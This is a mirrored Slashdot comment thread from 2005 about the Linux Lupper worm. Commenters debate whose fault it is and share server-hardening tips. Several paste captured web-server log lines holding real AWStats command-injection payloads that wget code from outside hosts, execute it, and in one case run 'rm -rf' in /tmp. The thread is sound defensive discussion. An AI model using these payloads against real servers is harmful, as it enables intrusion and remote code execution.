Slashdot Mirror
Linux Lupper.Worm In the WIld
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.
p.s. BURN KARMA BURN!
Ubuntu is an African word meaning 'I can't configure Debian'
Second, how do you remove it? Quoth the page:
tasks(723) drafts(105) languages(484) examples(29106)
Seems kind of wrong to name it exclusively a linux problem.
Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
Loading...
All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.
According to http://searchsecurity.techtarget.com/qna/0,289202, sid14_gci955041,00.html, this worm started in 2002... or am I mistaken?
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
Paraphrased from the virus description;
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you havent reformated your HDD in the lsat hour
THEN its time to pucker up and kiss the sucker goodbye..
-GenTimJS
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...
which in practice means that your admin have died a couple of years ago but was never replaced.
May Peace Prevail On Earth
So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST
.
.
.
For 60 hits.
Linux has a huge market share in the server market, idiot.
I doubt I'll have the libraries required to run this worm.
http://vil.nai.com/vil/RateThisPage.asp
Let Mcaffe know how well they're trolling.
The road between democracy and tyranny is paved with secrecy in the name of security.
McAfee sucks for real info, look at symantec or at my at summary. In short: Update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.
My wife's sketchblog Blob[p]: Gastrono-me
Symantec has a more coverage description page at http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html
including links to XML-RPC PHP1.x library vulnerabilities used by this malware.
This worm is also known as Linux.Plupii and Linux/Lupper.A too.
Internet Storm Center has a lot of technical information at their
http://isc.sans.org/diary.php?storyid=823
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.
"...today consumers have been conditioned to think of beer when they see a bullfrog..."
Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.
Javascript + Nintendo DSi = DSiCade
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable php or cgi script. I don't think many Linux system ship in this configuration. The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
According to MacAfee its: It is a modified derivative of the Linux/Slapper ...
And according to a 2002 cert advisory the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..
Surprisingly their seem to be no mention of it a apache.org which leads me to think it's pretty benign and not wide spread. I could be wrong.
That's Gnu/Linux worm to you, you insensitive clod!
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
/usr/bin/false. I realize that some people need cli access but it should be severly limited in it's functions and only used by those who have a real need.
1. don't permit external shell access through you www accounts. Make all you www accounts shell be
2. don't permit php/cgi scripts that are explotiable. Okay that is a broad general statement , however there are well known malicious scripts and well known explotiable scripts. Don't allow them. And certainly don't allow them if cli access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL
Politics is Treachery, Religion is Brainwashing
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
/tmp.
Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in
Unless I misundersand the article and comments, it seems that
Safety of Linux user who screws up >> MS user who does everything right
Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.
/. bug #926803 - Why I can post.
sounds to me like an apache with php problem.
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Why read the article when I can just make up a snap judgement?
Set up a cron to run at 1 minute intervals to rm -rf /tmp/lupii
Quite simple really.
Content Management System: A pretentious way of saying "text editor."
True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm is very similar to the Slapper worm. The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?
Javascript + Nintendo DSi = DSiCade
Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.
No one enables it though, I'm just being a smartass.
Nihil Illegitemi Carborvndvm
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html
Includes some previously unreleased facts about who wrote most of the code recycled in Slapper and in Lupper.
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and execute
Its quite obvious that this is a real security malpractice. Even if someone allows external shell commands from web server they usually limit access to this kind of resources.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
AFAIK, most distros let you choose which services will be installed, so its really up to user.
The Linux webserver would not be vunerable any way, since it does not support PHP.
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs. Also, most linux machines are converted wintel boxes, meaning that as far as sales stats go, Windows makes out really well. Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running. Now if that linux box originally was a windows box, as it is in most cases, then Microsoft would have 3 "points" and linux none.
Apple often uses sales figures to make their market share appear larger than it is, those numbers are not accurate and highly biased against linux. But as far as your little rant goes, this is an exploit in php and only php. But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine. This worm doesn't use an exploit, it uses people's stupidity that configure machines for convenience rather than security. It's akin to be leavning the door to my house not only unlocked, but wide open because I didn't feel like being inconvenienced by opening it every day. I've never heard of a box being configured the way the aritcle describes so this is indeed a rare occurence.
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes. Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages. If you look at Fedora's page in secunia you'll see that its advisories include updates for Mozilla, Squid, Wget, Abiword and every other package. Considering that one project has the burden of having to report and patch so many packages, you would expect the number to be much higher. Looks like linux is still kicking both Microsoft's and Apple's ass as far as security goes.
Regards,
Steve
because BSD is confirmed dead.'
Rich And Stupid is not so bad as Working For Rich And Stupid.
The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
...as a new distro sounds catchy, doesn't it?
one more thing: accorting to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
I checked my logs and found the following: /stats/awstats/awstats.pl?configdir=|echo%20;cd%20 /tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20membe rs.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm% 20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
[06/Nov/2005:18:13:39 -0500] "GET
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
"according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".
.chm help to another format. Of course, since lawyers know nothing about computers and money in america's justice matters so much it has not been hard for microsoft to convince lawyers that IE can't be separated from windows.
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that desktop background can use instead of using IE as "kitchen sink")
When microsoft means "tighly integrate", it means "OMG! If we remove IE people won't be able to use a jpg as background and won't be able to read chm help!", but it doesn't means it can't be removed if they wanted, like if they couldn't move the
Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.
/tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Oolite: Elite-like game. For Mac, Linux and Windows
It's not quite lunch, it's not quite supper; let's call it lupper!
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs.
:-)
But you'd need to do the same for Macs. Not that I'm saying that Apple is selling more X-Serve Units than Linux installs out there, but the figures for Macs won't show up in the same way that the Linux figures don't show up. It's especially important not to discount Macs as the WebObjects platform is very popular.
Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running.
I don't really buy this argument. Most Linux users I've seen reinstall their system for every major update, which tends to come more often than Windows. This is something of a requirement as software support isn't as long lasting on Linux as it is on Windows. i.e. Many developers make a concious effort to support machines going all the way back to Win98. Linux developers OTOH tend to target the latest GLIBC, thus requiring that the user churn through new installations at a fairly good clip. BSD machines seem to have a bit longer lifespan, but they also suffer from upgrade-or-die-itis. In the case of FreeBSD, however, the system is designed to be easily upgraded via a system recompile. (Which amazingly tends not to break things.)
But as far as your little rant goes, this is an exploit in php and only php.
Incorrect. It's an exploit against the AWStats CGI script and the PHP XML-RPC APIs. Apparently it can also exploit WebHints. (Whatever that is.)
But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine.
It is a very common configuration. Hundreds of inexpensive web hosts offer AWStats, and many personal web servers run it to track traffic. There are a LOT of people who are vulnerable to this exploit. Especially since people think of AWStats as being something hidden that only they can see. Why would they upgrade?
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes.
What's interesting though is the exploits themselves. Security experts have to really work to find an exploit, and most of the ones they find are impossible to actually exploit under any normal circumstances. e.g. If you check the link you provided, you'll notice how many say "local exploit" on them. As in, you need direct access to the machine before it can be exploited. Under Windows, already having access to the machine is the end of the world unless the user has explicitly locked things down. Under Linux, it depends on the quality of the security configuration. A smart admin would be using SUDO and time-lock screensavers. Not all systems are configured this way, however.
Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages.
That's a non-argument. Macs do everything the users want them to do and yet remain secure. That's the key point. Sometimes less is more.
Thank you for the well reasoned argument.
Javascript + Nintendo DSi = DSiCade
Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers?
... just so you don't need to feel left out.But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
- People switching to a mac won't need their productx
- People running linux won't need their products
- The 800-lb - oops - 1600 lb gorilla in the Window marketspace - Microsoft - is coming out with their own antivirus
If you were in their situation, what would you do?So wait, you are saying that the worm brings Linux and BSD systems into existence? That is amazing, and quite cool if you ask me!
Ohhhh, you meant "affect", not "effect". Someone attempting to be pedantic should choose their words carefully.
My beliefs do not require that you agree with them.
If you are a sysadmin that knows what you are doing, this worm would not effect you.
Let's look at this logically.
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
I just grep'd through my logs and found someone trying (perhaps beta-testing?) this exploit back in June 2005:
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;r m%20-rf%20*;killall%20-9%20perl;wget%20www.suxehac ker.home.ro/sess_3539283e27d73cae29fe2b80f9293f60; perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo% 20;echo| HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/tmp noexec on OS X?
xx.xxx.xx.xx - - [18/Jun/2005:05:51:35 -0400] "GET
Anyone know how to make
Hopefully from now on all worms and viruses will be named according to the OS they affect. I'm tired of hearing Windows worms/viruses referred to as if they were affecting all computers everywhere.
if member of {Windows, Sysadmin} then not exist
This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
the threat level is low to very low depending on reporting site and their need for money.
I prefer the "u" in honour as it seems to be missing these days.
So if you have a Windows, Solaris, OS-X, etc PHP system that has a problematic script, it could probably exploit and get in, but when it tried to run there'd be an error, since the OS wouldn't recognise the executable format. Other OSes that can do Linux binaries like FreeBSD could be potentially infected, but that's probably it. Also probably only works on x86 Linux, not PPC.
I'd try to sell a network/email scanning/monitoring package, myself, for the 'enterprise' environment. Company-wide antivirus for the network.
The World Wide Web is dying. Soon, we shall have only the Internet.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.That's what you believe. Yet my bank example shows that popularity has nothing to do with security.That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
Sweet! Do you get that girl on the front page after signing up for a year prepaid?
I love all the damage control the fanboi's throw out there.
OH THIS ISN'T A BIG DEAL
OH THIS ISN'T A LINUX PROBLEM SPECIFICALLY
OH IT'S ONLY ON THE 3RD SUNDAY OF THE 5TH MONTH
OH IF THIS WERE WINDOZ (INSERT NOT FUNNY JOKE HERE)
Come on guys, admit you got stung and deal with it. The more popular Linux becomes the more hackers will want to get into it. And since all the source for just about everything is out there, it's alot easier for the smart ones to find, test, & exploit vulnerablities.
Your no more secure then the rest of us, you just weren't on the radar. Now you are. Expect more to come.
Gadget News at Gizmo.com
I'm not seeing anything on my logs.
Why don't you post 10 of those "large number of IP addresses" so substantiate your claim?
Or is this a different worm that exploits awstats?
/cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
//cgi/awstats.pl?configdir=|
/cgi-bin/awstats.pl?configdiro %2fnc%3bchmod%20%2bx%20nc%3b.%2 0 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
First scan at my webserver:
xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET
Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET
%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:
xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET
=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.r
2fnc%20something4u.propagation.net%2065000%20%7c%
According to the linked site, you are vulnerable if you are running PHP (version?) and have a /{website dir}/cgi-bin directory. I guess that means anyone runnign PHP is vulnerable?
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
I would like to point out a significant detail. It is far easier to deflect blame away from Linux than it is from Windows because, unlike Windows, Linux doesn't "automatically install" anything. Linux is just a kernel. A linux distro is just a Linux kernel with hundreds of "3rd party apps" tacked on. I'm not knocking Linux at all. I love Linux. But it's not a fair comparison when you're playing the "installed by default" game. The Linux kernel is 100% secure because it can't do anything by itself.
If you mod me down, I shall become less powerful than you could possibly imagine.
Several people have noted that this only affects systems that allow a CGI or PHP script to execute arbitrary programs. I don't think most Windows systems have that short of "shell" access from CGI/PHP. Then again, I know ALAP about Windows...
why... That's not MS sharing the IE love, its them trying to open up Macs to virus', those dirty scoundrels!
192.50.74.27
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:49 PST
All 1663 scanned ports on 192.50.74.27 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.322 seconds
========
195.200.183.229
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:51 PST
Interesting ports on 195.200.183.229:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 62.432 seconds
========
200.218.224.224
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:53 PST
All 1663 scanned ports on 200.218.224.224 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 39.839 seconds
========
202.123.223.148
I killed the process after 2 minutes.
========
210.109.194.231
I killed this one too.
========
211.155.246.38
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 10:01 PST
All 1663 scanned ports on 211.155.246.38 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.386 seconds
========
Okay, I'm stopping there. I was under the impression that I'd be seeing some open ports. I can only verify port 80 on ONE of those so far.
How OLD are those entries? Why does it appear that the problem, if it ever existed on those machines, has been cleared already?
How did we get stung? Not being dependent on Micro$hit to deliver fixes to buggy 3rd-party scripts, this was "fixed" back in February. *Yawn.*
Now, I don't think most worms really process such errors but it makes me feel better than just ignoring them, and it seems to be far more legal than either redirecting them to fbi.gov or launching some kind of counterattack.
PHEM - party like it's 1997-2003!
Don't tell the windows people that linux has security holes, they may decide it's payback time!
"A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications."
Good luck buddy, I don't think you're gonna find 'em...
What every sysadmin should know is that the unpatched known holes of today are not only open doors for crackers, they are the open doors for the next worms.
Every sysadmin should check security sites like Secunia, with a list of unpatched known holes for each software they use:
http://secunia.com/
Unless you have tripwire or some off-disk checksums of your hard drive, you have no choice but to wipe and re-install configs and data from backups. If you haven't designed your systems to make this easy (keep all configs in /etc, /usr/local/etc, keep all customer data in one dir, etc), you're just making extra work for yourself OR making excuses why you shouldn't clean up a pwned machine.
/tmp, big deal".
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering
That's happened to me exactly once in my 10+ year career, but once was too much!
Here are the reported numbers:
"Sources" is a count of infected PCs, i.e., unique IP addresses "originating traffic".
"Targets" are the PCs "receiving traffic".
"Records" is the number of PACKETS observed.
What is odd is that while there are supposedly 111 PCs that are infected and sending out hack attempts, those 111 PCs seem to target ONLY 8 PCs, and the total PACKET transmitted/recieved on 11/03 was only 22K. Very strange. Very LOW numbers and with a VERY LIMITED number of boxes.
Notice that the majority of "infections" are occuring on Nov 3, 4 and 5, and the reports from THREE anti-virus houses are on the 4th and 5th, the same day as the big spike in the "infection":
A scan from VirusTotal detects "cback" as:
Antivirus Version Update Result
Fortinet 2.48.0.0 11.04.2005 Linux/Rev.B-bdr
Kaspersky 4.0.2.24 11.05.2005 Backdoor.Linux.Small.al
McAfee 4620 11.04.2005 Linux/BackDoor-Rev.b
For such an infintesimally small number of supposedly hacked boxes these three anti-Virus houses already have dection software which can see the "trojan". That is REALLY FAST dection code writing, deployment and reporting for such a SMALL number of boxes.
Has someone salted the Linux anti-virus mine to hype business?
Running with Linux for over 20 years!
if you're using mod_security on Apache/UNIX platforms, you can set this globally.
:)
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "deny,,status:412"
and only enable for VirtualHost blocks that needs it. be sure to patch your stuff!
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "allow,log," you can also enable Apache's SetEnvIf & conditional logging to pipe all xmlrpc.php requests to a centralized log file for analysis.
If you were in their situation, what would you do?
Considering that there is already ClamAV in Linux space? I Probably be weaving a golden parachute.
This sig. intentionally left blank.
Whatever makes you feel better. Nice 'solid' analogy, LOL.
Loading...
I've often noted that when faced with facts, the loser will make some braggart statement instead of attempting to present facts of his own.
And you're another example of that.
I've posted links and facts. You only have your claims based upon your complete lack of understanding of security. Buh bye!
I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.
:-D
Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server.
The Anti-Blog
Did you just offer me a cluestick while simply rewording what I said? You didn't even address the point of my post. I am returning your stick "postage due"
If you mod me down, I shall become less powerful than you could possibly imagine.
going to members.lycos.co.uk/sugi brings up some other files that look like they are phishers too. I think rather than immediatly shut them down, it would be more effective to set up a sting. Lycos could retrieve the last ip address to log into that account. If it wasn't a compromised machine, they could contact the isp. When the next login is attempted, they could have the isp locate which customer it is, and bust down their door.
It's really sad that the AV companies haven't tried to shut the site down via contacting Lycos. It really shows me their commitment to security for the sake of security.
If an officer ever threatens to taze you, say you have a pacemaker.
